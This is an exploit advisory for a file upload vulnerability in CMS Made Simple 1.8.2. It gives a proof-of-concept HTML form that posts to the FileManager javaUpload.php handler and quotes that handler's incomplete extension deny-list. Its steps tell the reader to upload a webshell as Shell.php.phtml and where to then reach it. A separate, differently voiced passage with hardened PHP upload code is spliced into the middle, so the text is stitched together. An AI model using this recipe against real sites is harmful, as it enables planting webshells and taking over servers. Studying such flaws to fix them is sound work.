cmsmadesimple-1.8.2 File Upload Vulnerability



EKU-ID: 1257 CVE: OSVDB-ID:
Author: ITTIHACK Published: 2011-11-07 Verified: Verified


#############################################################################################################
# Exploit Title: cmsmadesimple-1.8.2 File Upload Vulnerability                                              #
# Author: ITTIHACK                                                                                          #
# Software Site : http://www.cmsmadesimple.org                                                              #
# Download Link: http://s3.amazonaws.com/cmsms/downloads/5953/cmsmadesimple-1.8.2-base.tar.gz               #
# Version: 1.8.2                                                                                            #
# Category: webapps                                                                                         #
# Tested on: Windows 7                                                                                      #
# Home : http://ittihack.blogspot.com                                                                       #
#############################################################################################################


Proof of Concept:
---------------------------------------------------------------------------------------------------------------------------------------------------
1) file: uploadTest.html
<html>
<head>
<title>Upload Test</title>
</head>
<body>
<p>
<form method='POST' enctype='multipart/form-data' action='http://localhost/cmsmadesimple/modules/FileManager/postlet/javaUpload.php'>
File to upload: <input type=file name=userfile><br>
<input type=submit value=Press> to upload the file!
</form>
</p>
</body>
</html>
---------------------------------------------------------------------------------------------------------------------------------------------------
2) File: javaUpload.php

$uploaddir = '[PATH TO UPLOAD DIRECTORY]';   <-- here is the path for your shell
$allow_or_deny_method = "deny"; // "allow" or "deny"
$file_extension_list = array("php","asp","pl");
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .$_FILES['userfile']['name']))
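The handler quoted above keeps the client-supplied filename and relies on a deny-list that names only php, asp and pl, so any other extension the web server happens to execute (the advisory's own step uses .phtml, which is absent from the list) passes the check. As an added example, not code from the advisory or from the CMS Made Simple project, the following is a hardened replacement for that logic: an allow-list of extensions, refusal of names carrying more than one extension, a content check through fileinfo, and a server-generated filename in a directory assumed to sit outside the document root. The path /var/lib/cms-uploads, the size limit and the accepted types are assumptions for the example.

```php
<?php
declare(strict_types=1);
// Added example (not the CMS Made Simple code): a hardened replacement for the
// javaUpload.php logic quoted above.

// Allow-list: everything not listed is refused. A deny-list (as in the
// original) fails open for any executable extension it forgot to name.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];
const MAX_UPLOAD_BYTES   = 5 * 1024 * 1024;
// Assumed path, outside the document root so nothing stored here is served
// or executed by the web server.
const UPLOAD_DIR         = '/var/lib/cms-uploads';

/**
 * Decide whether a client-supplied filename is acceptable. Returns the single
 * lower-cased extension on success, or null when the name must be rejected.
 * Names with more than one dot are refused outright, so a second extension
 * never reaches the allow-list decision.
 */
function safe_extension(string $clientName): ?string
{
    // Strip any directory component the client may have sent.
    $base = basename(str_replace('\\', '/', $clientName));
    if ($base === '' || $base[0] === '.') {
        return null;                      // empty name or dotfile
    }
    $parts = explode('.', $base);
    if (count($parts) !== 2) {
        return null;                      // no extension, or more than one
    }
    $ext = strtolower($parts[1]);
    if ($ext === '' || !in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    return $ext;
}

/**
 * Store an upload under a server-generated name and return the stored path.
 * The client name is used only to pick the extension; it is never part of
 * the destination path, unlike the $uploaddir . $_FILES[...]['name']
 * concatenation in the original handler.
 */
function store_upload(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or missing');
    }
    if ($file['size'] > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('file too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    $ext = safe_extension((string) $file['name']);
    if ($ext === null) {
        throw new RuntimeException('file type not allowed');
    }
    // Cross-check the content against the extension (fileinfo extension).
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $mime     = $finfo->file($file['tmp_name']);
    $expected = [
        'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png',
        'gif' => 'image/gif', 'pdf' => 'application/pdf', 'txt' => 'text/plain',
    ];
    if (($expected[$ext] ?? null) !== $mime) {
        throw new RuntimeException('content does not match extension');
    }
    // Random, server-chosen name; the client never influences it.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);                   // never executable
    return $dest;
}

// Entry point when invoked as the form handler for the "userfile" field.
if (PHP_SAPI !== 'cli' && isset($_FILES['userfile'])) {
    try {
        store_upload($_FILES['userfile']);
        http_response_code(201);
        echo 'stored';                    // the stored path is not revealed
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . htmlspecialchars($e->getMessage());
    }
} elseif (PHP_SAPI === 'cli') {
    // Command-line self-check of the name policy: the first name is accepted,
    // the double-extension and .phtml names are refused.
    var_dump(safe_extension('photo.png'));
    var_dump(safe_extension('Shell.php.phtml'));
    var_dump(safe_extension('shell.phtml'));
}
```

Run from the command line the script only exercises the name policy; as a form handler it answers 201 or 400 and never echoes where the file was stored. The allow-list plus the single-extension rule is what closes the gap the advisory relies on: adding one more entry to a deny-list would leave every other server-executed extension open.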

==================================================================================================================================================

- Exploit:
http://localhost/cmsmadesimple-1.8.2-base/modules/FileManager/postlet/uploadTest.html
- Upload your shell as Shell.php.phtml
- You will find your shell here: http://localhost/cmsmadesimple-1.8.2-base/modules/FileManager/postlet/[PATH TO UPLOAD DIRECTORY]Shell.php.phtml
===================================================================================================================================================

./ITTIHACK